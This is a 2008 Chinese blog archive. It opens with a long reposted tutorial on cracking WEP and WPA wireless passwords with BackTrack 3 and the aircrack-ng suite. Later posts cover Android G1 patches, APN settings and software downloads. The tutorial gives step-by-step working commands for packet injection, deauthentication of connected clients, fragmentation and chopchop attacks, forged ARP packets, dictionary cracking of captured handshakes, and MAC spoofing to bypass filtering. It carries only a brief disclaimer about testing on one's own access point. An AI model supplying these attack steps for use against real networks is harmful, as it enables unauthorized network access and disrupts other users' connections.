2008-12-27

[转载]BT3破解无线WEP/WPA教程 - klmtxl的日志 - 网易博客

"声明:任何不经别人同意而进入别人网络都是非法和不道德的行为。
本教程用于学习和交流,如要实验请拿自已的AP开刀!!
题记:
本人是中国无线门户http://www.anywlan.com无线安全版块ID
“David98”,首先感谢版主longas还有像liyg、hrb011011、wifi和小
草等众多热心坛友的支持。
无线安全版块一直是本坛一个特殊而重要的版块,本版高手如
云,各类无线破解教程纷呈,但一直缺乏一个系统、全面而可理解和
学习的教程。我根据各位坛友的教程和自己的理解整理编辑成这篇
《BT3破解无线WEP/WPA教程》。
由于本人也是初学者,缺乏专业的理论知识,因此文中不免存在理
解的偏差甚至错误,希望各位朋友指正。
最后希望更多的朋友参与到教程的整理和编辑中,不断把教程修
正和完善。
对无线WEP和WPA 破解有兴趣的朋友也可加入QQ群:
14121760一起交流。
谢谢!!
David98
08年5月22日
中国无线门户David98出品
Anywhere WLAN!! 3
WEP破解
1.装备: IMBX60笔记本(内置Intel3945 无线网卡)、BT3 的U盘系统(需用syslinux命令来指定启动
BT3 的盘符)
2.用户名:root密码:toor,进入图形界面:startx。启动BT3 后,(启动黑屏:xconf再输入startx)
3.加载3945 网卡的驱动。打开一个shell
输入 modprobe –r iwl3945
输入 modprobe ipwraw
注:不同的网卡有不同的加载方式
4. 查找目标:
用Airoscript命令(Backtrack/radio network analysis/80211/all/Aioscript)的扫描功能
连续三次都选择1 发现5个,有4 个加密,data 都是0,开放的netgear 那个AP有一个客户端。PWR
值一般看出信号强度。也可以用airodump-ng wifi0 来搜索
我们选择第一个作为目标,channel为11(上图中的CH 代表信道)。
中国无线门户David98出品
Anywhere WLAN!! 4
注:修改自己网卡的MAC地址的命令。
输入macchanger –m 00:11:22:33:44:55 wifi0
5.激活网卡的Monitor模式并工作在11 信道。(加载网卡,激活监听模式,工作在11 信道)
输入 airmon-ng start wifi0 11 也可用iwconfi wifi0 来查看网卡的工作模式和工作信道。
可用aireplay-ng --test wifi0 来测试是否可以注入
中国无线门户David98出品
Anywhere WLAN!! 5
6.输入截取数据包命令(截取11 信道的ivs数据包,并保存名为name.ivs)
输入命令 airodump-ng --ivs -w name -c 11 wifi0 ,
(--ivs:仅截取ivs数据包,-w:写入文件,-c:截取ivs的信道)
(其中name是获取的ivs 的保存文件的名字,11 是channel值,你根据实际修改)
一. 有客户端WEP 破解
1.有客户端,且合法客户端产生大量有效的数据,能直接获得大量IVS。
思路:1-6步同上
7.直接用aircrack-ng破解
第七步: aircrack-ng -n 64 -b <ap mac> name-01.ivs
中国无线门户David98出品
Anywhere WLAN!! 6
2.有客户端,合法客户端只能产生少量ivs 数据,就需要注入攻击加速产生大量ivs。
只要有少量的数据就可能获得arp 请求包,则可用arp 注入模式的-3 模式通过不断向AP 发送
同样的arp请求包,来进行注入式攻击。
思路:1-6步同上
7.用aireplay-ng的arp注入方式获得大量的ivs
第七步:aireplay-ng -3 -b <ap mac> -h <合法客户端 mac> wifi0
注:这一步可能时间会长一点,因为需要等到ARP。
中国无线门户David98出品
Anywhere WLAN!! 7
3.有客户端,但是客户端根本不在通信,不能产生ARP包。-3注入模式不成功
思路:1-6步同上
7.-0 冲突模式强制断开合法客户端和ap连接,使之重新连接
8.利用-0冲突模式重新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入
第七步:aireplay-ng -3 -b <ap mac> -h <合法客户端 mac> wifi0
第八步:aireplay-ng -0 10 –a <ap mac> -c <合法客户端 mac> wifi0
中国无线门户David98出品
Anywhere WLAN!! 8
4.有客户端,并且客户端能产生有效arp 数据的另类破解方式
前面的步骤一样:
输入 modprobe –r iwl3945
输入 modprobe ipwraw
输入airmon-ng start wifi0 11
现在,只要一个命令就搞定,输入:
输入wesside-ng -i wifi0 -v 01:02:03:04:05:06 (此格式的AP MAC)。
很简单吧,密码出来了。
中国无线门户David98出品
Anywhere WLAN!! 9
二.无客户端WEP破解
思路:1-6步同上
因为是无客户端,所以第一步就需要和AP之间建立一个虚拟连接。
这是非常关键的一步。为让AP 接受数据包,必须使自己的网卡和AP 关联。如果没有关联的话,目标AP
将忽略所有从你网卡发送的数据包,IVS数据将不会产生。
第七步:输入 aireplay-ng -1 0 -e <ap essid> -a <ap mac> -h < mac> wifi0
如果回显虚拟伪装连接不成功,不能成功的原因很多,具体有如下几种:
1、目标AP做了MAC地址过滤
2、你离目标AP物理距离太远
3、对方使用了WPA加密
5、网卡、AP可能不兼容,网卡没有使用和AP一样的工作频道
也可以使用命令tcpdump来确认网卡是否已经连接到目标AP上
tcpdump -n -e -s0 -vvv -i wifi0
中国无线门户David98出品
Anywhere WLAN!! 10
1.第一种破解方式:
思路:1-7步同上
建立虚拟连接后直接用-2 交互攻击模式,这个模式集合了抓包和提取数据,发攻击包三种能力。
第八步:抓包,提数据和发包攻击
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
发包成功后可得到足够的ivs,然后用aircrack-ng破解。
成功后如上图截获了一个可以直接进行注入的数据包,并回显Use this packet,按y 然后开始
发包攻击,date飞快涨。当获得足够的ivs以后就可破解了。
中国无线门户David98出品
Anywhere WLAN!! 11
2.第二种破解方式:
思路:1-7步同上
第八步:利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件(xor 文件)
第九步:然后通过数据包制造程序Packetforge-ng提取xor 文件中的PRGA伪造一个arp包,
第十步:最后利用交互式攻击模式-2发包攻击。
第八步:采用碎片包攻击模式-5,获得一个PRGA数据包(xor文件)。
输入aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
如顺利,将得到一个可利用的数据包如上图,系统将回显 Use this packet ? 输入y 回车,将得到一个至
关重要的xor 文件。
再输入ls 查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。
中国无线门户David98出品
Anywhere WLAN!! 12
第九步:用数据包制造程序packetforge-ng将上面获得的xor 数据包伪造成可利用的ARP注入包。
输入packetforge-ng -0 -a <ap mac> -h <my mac> -k 255.255.255.255 –l 255.255.255.255 -y
name-xor -w myarp
参数说明:
-y (filename)是用来读取PRGA的文件
-w (filename)将arp包写入文件,我用的文件名是myarp
系统回显:Wrote packet to: mrarp
中国无线门户David98出品
Anywhere WLAN!! 13
第十步:采用交互模式-2,发包注入攻击。
输入aireplay-ng -2 –r myarp -x 256 rausb0
【-r】:从指定文件中读取arp数据包
【-x】:定义每秒发送的数据包数量。为避免网卡死机,可选择256,最高不超过1024
输入y 回车 攻击开始
中国无线门户David98出品
Anywhere WLAN!! 14
这时,前面的抓包窗口上的data 将迅速增加。
到数据增加到1.5万以上时。
第十一步:采用aircrack-ng 来进行破解
中国无线门户David98出品
Anywhere WLAN!! 15
3.第三种破解方式:
思路:1-7步同上
第八步:利用-4的Chopchop 攻击模式获得一个可用的包含密钥数据文件(xor 文件)
第九步:通过数据包制造程序Packetforge-ng提取xor 文件中的PRGA伪造一个arp包
第十步:最后利用交互式攻击模式-2发包攻击。
第八步:采用-4 的Chopchop 攻击模式获得一个包含密钥数据的xor 文件
输入aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
参数说明:
-b:设置需要破解的AP的mac
-h:设置用于连接的无线网卡的mac(自己网卡)
顺利将得到一个可利用的数据包,按y 将利用此数据包生产一个xor 文件
如上图所示得到一个名为replay_dec-0523-075615的xor 文件,
中国无线门户David98出品
Anywhere WLAN!! 16
第九步:通过数据包制造程序Packetforge-ng提取上面xor 文件来伪造一个arp包
输入packetforge-ng -0 -a <ap mac> -h <my mac> -k 255.255.255.255 –l 255.255.255.255 -y
name-xor -w myarp
如上图,成功生成一个名为myarp的可用来注入的arp数据包。
第十步:最后利用交互式攻击模式-2发包攻击。
输入aireplay-ng -2 -r myarp rausb0
发现了可利用的myarp的数据包,按y后,立刻注入攻击。Date疯涨
中国无线门户David98出品
Anywhere WLAN!! 17
破 解 WPA
1、加载无线网卡驱动
2、设置网卡为在指定的ap 的工作频道的监控模式
这两部与前面相同
3、 输入截取数据包命令(截取11信道的cap 数据包,并保存名为12345.cap)
输入命令 airodump-ng -w 12345 -c 11 wifi0 ,
(-w:写入文件,-c:截取cap的信道)
(其中12345 是获取的cap的保存文件的名字, 11是channel值,你根据实际修改。)
回车后可以看到是WPA-TIKP-PSK 加密方式
中国无线门户David98出品
Anywhere WLAN!! 18
4、进行-0的Deauth验证攻击
这里为了便于WPA握手验证包的获取,必须进行Deauth验证攻击,这个对于采用WPA验证的AP攻击都
会用到,可以迫使AP重新与已连接的合法客户端进行握手验证,重新握手验证过程中获得验证数据包。
输入: aireplay-ng -0 10 -a <ap mac> wifi0
或者输入:aireplay-ng -0 10 -a <ap mac> -c <my mac> wifi0
解释:-0 指的是采取Deautenticate 攻击方式,后面为发送次数。-c 建议还是使用,效果会更好,这个后面
跟的是监测到的合法的已连接的客户端MAC地址,如上图中显示的。
这里注意,Deauth 攻击往往并不是一次攻击就成功,为确保成功截获需要反复进行,需要说明的是,攻击
期间很可能会导致该AP的其它无线客户端无法正常上网即断网频繁,而且对于一些低端AP可能会导致其
无线功能假死,无法ping通,需重起。
是否获得包含WPA 握手验证包的Cap文件,需要在破解时进行验证,以上Deauth 攻击几次后可以做破解
尝试。WPA破解不用等到数据Data 达到几万,因为它只要一个包含WPA握手验证包就可以了,通过上面
的方法我们已经获得破解WPA 所需的cap文件。即可进行下一步的破解。
中国无线门户David98出品
Anywhere WLAN!! 19
5、用得到的CAP 数据包以后进行WPA 破解
破解方式一:用Cap数据包直接暴力破解
从破解难度上讲WEP 是很容易破解的,只要你收集足够的Cap 数据包就肯定可以破解。WPA 的破解需要
有好的密码字典配合才能完成,复杂的WPA密码可能几个月也破解不出来。
1、WEP 数据Cap破解
输入:aircrack-ng -z –b <ap mac> 12345*.cap
12345 是步骤3 中输入的cap的文件名。系统会自动在你输入的文件名后加上-01、-02(如果数据包太多,
系统会自动分成几个文件存储并自动命名,可以使用ls查看),输入12345*是打开所有1234 相关的cap文
件。
常见问题:步骤3中收集数据包已达30W,无法破解密码。可能系统自动分成了几个文件贮存cap包。
如输入name-01.cap 破解可能导致破解不成功,建议使用name*.cap 选择所有的cap 包进行破
解。
中国无线门户David98出品
Anywhere WLAN!! 20
破解方式二:WPA 数据Cap破解
输入:aircrack-ng –w password.txt –b <ap mac> 12345*.cap
(-w:是字典破解模式)
Password.txt是你事先准备好的字典。WPA密码破解必须使用字典破解模式。
技巧:可以在windows 下使用下载的字典工具生产字典,再在BackTrack3 下拷贝到/root 下(aircrack 默认
的工作目录在/root)。
请注意,破解WPA 密码的时间取决于密码难易程度,字典包含程度,内存及CPU 等。多则数小时。也可
以把CAP数据包拷贝出来在WIN下用WinAircrack 破解。
注意点:
针MAC 地址过滤问题: 因为AP 只回应认证的的客户端. 用airodump-ng 搜索到刚刚连接上AP的
MAC地址,把自己的修改为这个MAC地址,就可以突破MAC地址过滤的 。
中国无线门户David98出品
Anywhere WLAN!! 21
Aireplay-ng的6种攻击模式详解
-0 Deautenticate 冲突模式
使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,
从而产生有效ARP request。
如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3 也无法产生有效ARP
request。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活。
aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0
参数说明:
【-0】:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上
网)
【-a】:设置ap的mac
【-c】:设置已连接的合法客户端的mac。如果不设置-c,则断开所有和ap连接的合法客户端。
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器
-1 fakeauth count 伪装客户端连接
这种模式是伪装一个客户端和AP进行连接。
这步是无客户端的破解的第一步,因为是无合法连接的客户端,因此需要一个伪装客户端来和路由器相连。
为让AP接受数据包,必须使自己的网卡和AP关联。如果没有关联的话,目标AP将忽略所有从你网卡发
送的数据包,IVS 数据将不会产生。用-1 伪装客户端成功连接以后才能发送注入命令,让路由器接受到注
入命令后才可反馈数据从而产生ARP包。
aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0
参数说明:
【-1】:伪装客户端连接模式,后面跟延时
【-e】:设置ap的essid
【-a】:设置ap的mac
【-h】:设置伪装客户端的网卡MAC(即自己网卡mac)
-2 Interactive 交互模式
这种攻击模式是一个抓包和提数据发攻击包,三种集合一起的模式
1.这种模式主要用于破解无客户端,先用-1建立虚假客户端连接然后直接发包攻击
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
参数说明:
【-2】:交互攻击模式
【-p】设置控制帧中包含的信息(16进制),默认采用0841
【-c】设置目标mac地址
【-b】设置ap的mac地址
【-h】设置伪装客户端的网卡MAC(即自己网卡mac)
2.提取包,发送注入数据包
aireplay-ng -2 –r <file> -x 1024 wifi0
发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,可以选择1024。
中国无线门户David98出品
Anywhere WLAN!! 22
-3 ARP-request 注入攻击模式
这种模式是一种抓包后分析重发的过程
这种攻击模式很有效。既可以利用合法客户端,也可以配合-1 利用虚拟连接的伪装客户端。如果有合法客
户端那一般需要等几分钟,让合法客户端和ap 之间通信,少量数据就可产生有效ARP request 才可利用-3
模式注入成功。如果没有任何通信存在,不能得到ARP request.,则这种攻击就会失败。如果合法客户端和
ap之间长时间内没有ARP request,可以尝试同时使用-0 攻击。
如果没有合法客户端,则可以利用-1 建立虚拟连接的伪装客户端,连接过程中获得验证数据包,从而产生
有效ARP request。再通过-3模式注入。
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
参数说明:
【-3】:arp注入攻击模式
【-b】:设置ap的mac
【-h】:设置
【-x】:定义每秒发送数据户包的数量,但是最高不超过1024,建议使用512(也可不定义)
-4 Chopchop 攻击模式,用以获得一个包含密钥数据的xor 文件
这种模式主要是获得一个可利用包含密钥数据的xor 文件,不能用来解密数据包。而是用它来产生一个新
的数据包以便我们可以进行注入。
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
参数说明:
-b:设置需要破解的AP的mac
-h:设置虚拟伪装连接的mac(即自己网卡的mac)
-5 fragment碎片包攻击模式 用以获得PRGA(包含密钥的后缀为xor 的文件)
这种模式主要是获得一个可利用PRGA,这里的PRGA 并不是wep key数据,不能用来解密数据包。而是
用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标AP重新广播包,当AP重广播
时,一个新的IVS将产生,我们就是利用这个来破解
aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
【-5】:碎片包攻击模式
【-b】:设置ap的mac
【-h】:设置虚拟伪装连接的mac(即自己网卡的mac)
中国无线门户David98出品
Anywhere WLAN!! 23
Packetforge-ng:数据包制造程序
Packetforge-ng <mode> <options>
Mode
【-0】:伪造ARP包
packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 –k 255.255.255.255 -l 255.255.255.255
–y<.xor file> -w mrarp
参数说明:
【-0】:伪装arp数据包
【-a】:设置ap的mac
【-h】设置虚拟伪装连接的mac(即自己的mac)
【-k】<ip[:port]>说明:设置目标文件IP和端口
【-l】<ip[:port]>说明:设置源文件IP和端口
【-y】<file>说明:从xor 文件中读取PRGA。后面跟xor 的文件名。
【-w】设置伪装的arp包的文件名
Aircrack-ng:WEP 及 WPA-PSK key 破解主程序
Aircrack-ng [optin] <.cap/.ivs file>
Optin
aircrack-ng -n 64 -b <ap mac> name-01.ivs
参数说明:
【-n】:设置WEP KEY 长度(64/128/152/256/512)
aircrack-ng -x -f 2 name-01h.cap
参数说明:
【-x】:设置为暴力破解模式
【-f】:设置复杂程度,wep密码设置为1,wpa 密码设置为2
aircrack-ng -w password.txt ciw.cap
【-w】:设置为字典破解模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到WPA 验证的抓包
文件。"

2008-12-20

G1的LED灯是五彩的

G1的LED灯是五彩的
装missed call软件,才发现G1的LED灯有蓝色,红色,绿色,粉色,橙色,紫色可以选。

【转载】G1联系人按拼音排序补丁 for Modify RC30 - Google手机综合讨论区 - WeiPhone威锋网 iPhone 论坛|iPod Touch 论坛|Google Android手机论坛|我们的iPhone - Powered by Discuz!

G1联系人按拼音排序补丁 for Modify RC30 - Google手机综合讨论区 - WeiPhone威锋网 iPhone 论坛|iPod Touch 论坛|Google Android手机论坛|我们的iPhone - Powered by Discuz!: "G1联系人按拼音排序补丁 for Modify RC30
全球首发!终于能让联系人按拼音排序了!而且,不只与此。理论上,任何用系统所带的sqlite数据库进行排序的应用,都将按拼音顺序排列汉字(无论简体繁体)。目前表现最明显的是在Contacts中。

这个补丁安装的前提是必须已经安装了Modify RC30,就是所谓越狱后的RC30版固件。越狱后的其它版本固件我猜也能用。

安装方法:

先将附件文件拷贝到sd卡根目录上。然后进入Terminal Emulator,依次执行:

$ su
# mount /system -o remount,rw
# mkdir /data/patches
# busybox cp /sdcard/libicudata.so /data/patches/
# cd /system/lib
# mv libicudata.so libicudata.so.orig
# ln -s /data/patches/libicudata.so libicudata.so

重新启动G1,大功告成!

欢迎报告使用情况和建议!现在正在弄电话号码按中文习惯分割……


[ 本帖最后由 sunner 于 2008-12-20 20:55 编辑 ]
附件

libicudata.so (2.68 MB)

2008-12-20 20:52, 下载次数: 0

G1联系人拼音排序补丁"

2008-12-19

iFanr爱范儿...Fan&Fun...小众讨论 - Powered by Discuz! Board

iFanr爱范儿...Fan&Fun...小众讨论 - Powered by Discuz! Board: "2008.12.08-Android中文输入法 A4发布帖~ 有问题请回复本帖 [打印本页]
作者: FirstFan 时间: 2008-12-8 00:01 标题: 2008.12.08-Android中文输入法 A4发布帖~ 有问题请回复本帖

12.08 0点发布
请adb uninstall zta4.serverII来卸载之前版本

来不及写太多,说一些简单的必要的说明
1. 软键盘模式下打开联想的,硬键盘模式我关了联想模式。所以软键盘模式下上完字后,有联想词的话,空格和return都没用,都会被用来上屏,请先按下删除,这时就关了联想了
2. 程序退出或切换时会自动把内容复制到剪贴板,所以其实只要经常长按小房子键来在输入法和需要输入的程序间切换粘贴,还是挺方便的
3. 硬键盘状态下,请用菜单切换中英文输入法,这个我尽快改个按键出来吧,不然我也觉得麻烦
4. 硬键盘中文模式下,只有个别几个标点符号转全角的了,这个还需要完善
5 候选区翻页按钮确实不太好点,可以用滚轮上下转动来翻页
6 软键盘拼音输入过程中,?是切音符,完成后?调出标点,目前确实比较少一些
-------
软件说明:
基于A4内核的中文输入法,支持联想,支持简拼

如何安装?
1.就是market下载apkinstaller
2.下载附件并解压到卡上根目录。
用USB线连上电脑,你会看到手机上出现个usb的图标,下拉,选mount就可以把文件放到卡上了。
3.用apkinstaller执行拷贝到卡内的a4.apk



[ 本帖最后由 FirstFan 于 2008-12-8 09:43 编辑 ]

附件: A4.apk (2008-12-8 00:01, 725.76 KB) / 该附件被下载次数 254
http://bbs.ifanr.com/attachment.php?aid=404&k=7a431f828c72c519a695a0720fc06419&t=1229692417"

G1手机收发彩信并通过cmwap上网apn设置:北京地区特殊设定

如下方法设置可以通过cmwap上网,同时可以接收彩信,通过可以使用浏览器浏览网页,market不支持,同步也不支持。
具体设置如下
name cmwap
apn cmwap
proxy 10.0.0.172 (如设置后没有网络连接图标这里改成010.000.000.172)
port 80
username 空
pasword 空
mmsc http://mmsc.monternet.com
mms proxy 010.000.000.172
mms port80
mcc 460
mnc00
apn type 空
注意mssc要填,不填可能会找不到gprs"
======================================

20090331编辑

最好升级radio firmware部分,可以通过刷xda-developer泄漏出来的G2 magic的rom来更新
更新后 在about phone 界面 显示 BaseBand version 62.50S.20.17H_2.22.19.23

这样按拨号界面按 *#*#4636#*#* phone info 菜单最下面回出来一个选项,Toggle DNS check 0.0.0.0 allowed  GPRS 就能稳定连接上了。

【转帖】Gphone常用第三方软件推荐 - HTC G1 综合讨论 - Android 玩家中文网 Gphone 论坛 玩家站点-Google|中国移动|HTC|琦基|MOTO|索尼爱立信|Ophone|Linux|T-mobile - Powered by Discuz!

Gphone常用第三方软件推荐 - HTC G1 综合讨论 - Android 玩家中文网 Gphone 论坛 玩家站点-Google|中国移动|HTC|琦基|MOTO|索尼爱立信|Ophone|Linux|T-mobile - Powered by Discuz!: "Gphone常用第三方软件推荐
Gphone, 软件, 推荐
各种Gphone应用程序,满足我的苛刻百变的要求:

1. 电话:这个不用多讲
2. 电话本:Contacts(自动与Google Contacts同步),这个超强,不过只能通过网络同步
3. 行程安排:Calendar(自动与Google Canlendar同步), Tag ToDo, QuickList
4. 地图:Maps, 配合GPS模块可以更好地定位目前所在位置。
5. 闹钟:Alarm Clock(上班不至于迟到)
6. 浏览器:Browser, chrome浏览器,速度很快,可惜暂时还不支持FLASH显示;另外OPERAMINI也出来了,还有正在开发的UCWEB。
7. Email收发:内置Gmail, Email,只有Gmail能支持push mail, Email的暂时没用到。
8. 即时通讯:GTALK,MSN(不过我的MSN总是不能提供,提示找不到SIM卡的号码,奇怪!)
9. 第三软件安装:Appsinstaller。将下载好的 .APK文件通过USB传到电脑后,启动Appsinstaller软件会自己搜索,选择进行安装。
10. 读书:aReader(开发者Fluke是我朋友,我的G1就是经他手得到的,期待PDF,DOC,Xls等文件的支持)
11. 娱乐:Brain Genius Deluxe(每天都会玩一阵, BonsaiBlast(很经典的游戏,还可以吃符咒,强大),PAC-MAN(一直没找到下载,据说需要T-MOBILE的卡才可以下载, 又或者是收费的);另外还有Coloroid, CB Balckjack, Snake。
12. 文件管理:Android File Manager, Bender, Glance,本人使用的是Bender,软件还可以,满足一般的操作,但是有时程序会崩溃.
13. 文本记录:暂时还没有试用(只要是中文输入法还没有出来),目前已经有几个,例如AK Notepad,Notepad 。
14. Feeds 关注:OI News Reader(类似Greatnews),订阅还是在GReader中读(网友推荐,待测)
15. 音乐:Music, 期待中文版可显歌词功能。
16. 无聊的旅途中看电影:Video Player, YouTube(没有WIFI的话还是算了)
17. 英语字典:WordMate(国人开发的词典工具,词库可扩展,有前途),Translate(支持150种语言,可句子,流行语翻译,很强大)
18. 天气查询:AccuWeather(自己没试过,网上介绍不错)
19. 照相机:Camera,内置的简单的照相软件,功能简单,可以接受,但是举欣然接受。
20. 照片编辑:PicSay(FUNNY)
21. 指南针:Orienteer(可惜自己看不懂,太傻了)
22. 手电筒:Flashlight(G1没有闪光灯,只能用屏幕显白光当手电筒罗,黑夜中还是有需要的。)
23. 手机所在位置GPS:Pintail,PinPoint(网友推荐,待测)
24. 行程记录:GPS Tracker, Mileage Ledger(网友推荐,待测)
25. 购买礼物单:Shoping list(网友推荐,待测)"

android G1用CMWAP上网 【续】

根据这位网友的测试,G1内置的浏览器是可以通过cmwap的apn上网的。其它的网络应用cmwap应该不行。估计主要问题还是在useragent上,各地封禁情况不同。

教你如何在G1用CMWAP上网 -Android 玩家中文网"楼主的设置方式是可行的!我试了一下,我在移动网站关闭了CMNET的业务也就是说上不了GPRS,更谈不上流量,但是我本卡是传说中的CMWAP 20元包月卡,通过设置,打开前缀名WAP的网站基本是UMRL的格式就是说根本打不开,但是打开WWW的网站却很快,而且完美显示,但是在子页面会出现乱码。登录不了google map\网上网络商店等需要GPRS流量的工具,同时机器出现了gmail更新的标志,但是无法更新,尝试了6分钟,怕如跟帖的说产生过大的费用,就关闭了,通过流量计费工具,发现一共产生了1.56M的流量,拨打10086查询话费!奇迹出现了没有扣费!说明此方法可行,希望大家也去尝试一下,不过要记得关闭CMNET业务啊!"

根据ucweb论坛中这个帖子 android版本的ucweb已经在开发中了。

==============================
目前的状态:朝阳区很容易连上cmwap,海淀连不上 

最好升级radio firmware部分,可以通过刷xda-developer泄漏出来的G2 magic的rom来更新
更新后 在about phone 界面 显示 BaseBand version 62.50S.20.17H_2.22.19.23

这样按拨号界面按 *#*#4636#*#* phone info 菜单最下面回出来一个选项,Toggle DNS check 0.0.0.0 allowed  GPRS 就能稳定连接上了。

2008-12-11

BackTrack 3 Final and Beta2 下载 - 无限共享 - 中国无线论坛 无线网络爱好者交流学习平台

BackTrack 3 Final and Beta2 下载 - 无限共享 - 中国无线论坛 无线网络爱好者交流学习平台: "BackTrack 3 Final and Beta2 下载
BackTrack 3 Final 光盘版
Name:: bt3-final.iso
Size: 695 MB
Download: http://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3-final.iso
MD5: f79cbfbcd25147df32f5f6dfa287c2d9
SHA1: 471f0e41931366517ea8bffe910fb09a815e42c7


BackTrack 3 Final USB版
Name:: bt3final_usb.iso
Size: 784 MB
Download: http://cesium.di.uminho.pt/pub/backtrack/bt3final_usb.iso
MD5: 5d27c768e9c2fef61bbc208c78dadf22
SHA1: 3aceedea0e8e70fff2e7f7a7f3039704014e980f

Download: http://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3final_usb.iso(感谢死亡阴影提供)


BackTrack 3 Final 虚拟机镜像版
Name: BACKTRACK3_VMWare.rar
Size: 689 MB
Download: http://ftp.heanet.ie/mirrors/backtrack/BACKTRACK3_VMWare.rar
MD5: 94212d3c24cf439644f158d90094ed6a
SHA1: 21c9a3f9658133efff259adbe290723583b4fd82


BackTrack 3 Beta2光盘版
Name:: bt3b141207.iso
Size: 701 MB
Download: ftp://91.121.6.119/bt3b141207.iso - torrent
md5sum : 04ed8742fc8facd1ecc8c9f6f567c116
shasum : 70c33e0aa75a978b8a87a207bf488ecec8d10a87

BackTrack 3 Beta2 DVD USB版
Name:: bt3b141207.rar
Size: 947 MB
Download: ftp://91.121.6.119/bt3b141207.rar - torrent
md5sum: bd0d8f507502787184b187f5a39288df
shasum: 853b80a77e3881e8084c797ba55077ead15f84ae)"

2008-12-08

2008.12.08-Android中文输入法 A4发布帖~ 有问题请回复本帖 - Symbian,Android 原创软件讨论 - iFanr爱范儿...Fan&Fun...小众讨论 - Powered by Discuz!

2008.12.08-Android中文输入法 A4发布帖~ 有问题请回复本帖 - Symbian,Android 原创软件讨论 - iFanr爱范儿...Fan&Fun...小众讨论 - Powered by Discuz!: "2008.12.08-Android中文输入法 A4发布帖~ 有问题请回复本帖
12.08 0点发布
请adb uninstall zta4.serverII来卸载之前版本

来不及写太多,说一些简单的必要的说明
1. 软键盘模式下打开联想的,硬键盘模式我关了联想模式。所以软键盘模式下上完字后,有联想词的话,空格和return都没用,都会被用来上屏,请先按下删除,这时就关了联想了
2. 程序退出或切换时会自动把内容复制到剪贴板,所以其实只要经常长按小房子键来在输入法和需要输入的程序间切换粘贴,还是挺方便的
3. 硬键盘状态下,请用菜单切换中英文输入法,这个我尽快改个按键出来吧,不然我也觉得麻烦
4. 硬键盘中文模式下,只有个别几个标点符号转全角的了,这个还需要完善
5 候选区翻页按钮确实不太好点,可以用滚轮上下转动来翻页
6 软键盘拼音输入过程中,?是切音符,完成后?调出标点,目前确实比较少一些
-------
软件说明:
基于A4内核的中文输入法,支持联想,支持简拼

如何安装?
1.就是market下载apkinstaller
2.下载附件并解压到卡上根目录。
用USB线连上电脑,你会看到手机上出现个usb的图标,下拉,选mount就可以把文件放到卡上了。
3.用apkinstaller执行拷贝到卡内的a4.apk



[ 本帖最后由 FirstFan 于 2008-12-8 09:43 编辑 ]"

2008-12-07

设置彩信,接收成功,请大家帮忙测试(北京地区) - Google手机综合讨论区 - WeiPhone威锋网 iPhone 论坛|iPod Touch 论坛|Google Android手机论坛|我们的iPhone - Powered by Discuz!

设置彩信,接收成功,请大家帮忙测试(北京地区) - Google手机综合讨论区 - WeiPhone威锋网 iPhone 论坛 "设置彩信,接收成功,请大家帮忙测试(北京地区)
本帖最后由 foolfox 于 2008-12-7 11:34 编辑

按照原来兄弟帖子设置的彩信总不成功,自己瞎琢磨了一晚上,成功了,分享一下,主要区别在于上面PROXY的位数设置上。
另外,在设置之前请将原先机器自带的TMOBILE所有彩信设置记录删除。另外,我的机器版本为RC-8的。

大家帮忙测试:
name:cmcc mms
apn:cmwap
proxy:010.000.000.172
port:80
username:无
password:无
server:无
mmsc:http://mmsc.monternet.com
mms proxy:010.000.000.172
mms port:80
mcc:460
mnc:00
apn type:无"

2008-12-06

aBus第三方软件安装工具 v1.0 - Google手机综合讨论区 - WeiPhone威锋网 iPhone 论坛|iPod Touch 论坛|Google Android手机论坛|我们的iPhone - Powered by Discuz!

aBus第三方软件安装工具 v1.0 - Google手机综合讨论区 - WeiPhone威锋网 iPhone 论坛|iPod Touch 论坛|Google Android手机论坛|我们的iPhone - Powered by Discuz!: "aBus第三方软件安装工具 v1.0
aBus是一款专为搭载Android系统手机制作的PC端第三方软件安装工具。你只需要点击一个按钮,就能轻松的将本地电脑上的Android软件安装到你的手机中,绝对是鸡疯们必备的一款实用工具。

使用指南:  

1.使用本软件之前,请先下载并安装Android官方驱动,点击这里查看安装教程  

2.安装完驱动后,请打开手机主菜单,找到并进入settings设置界面,然后依次点击Applications -> Development,最后勾选第一个USB debugging选项即可。"

NEC DVD Firmware Downloads

NEC 刻录机固件更新。
NEC DVD Firmware Downloads: "NEC DVD-ROM Firmware Flash Utility Download
Please note
Firmware updates for NEC DVD drives will generally only add new media information and will not solve issues in conjunction with some software packages.

If the firmware upgrade is not performed correctly or if the power supply is interrupted during the upgrade, the drive may be rendered unusable. If you wish to upgrade the firmware, you do so at your sole and exclusive risk. NEC takes no responsibility for any errors or problems with any firmware upgrade. This software is provided 'as is' with no warranty whatsoever. NEC will not supply any technical service or support regarding this firmware or any upgrade.

The NEC firmware upgrade below should not be used with external USB / FireWire drives or with OEM drives from HP, DELL, Medion, Fujitsu, Siemens, Gateway, or any other OEM manufacturer. If you wish to update the firmware on an OEM drive, please contact the dealer or manufacturer.

Download Firmware: ND-1100A FW 1.93"

2008-12-05

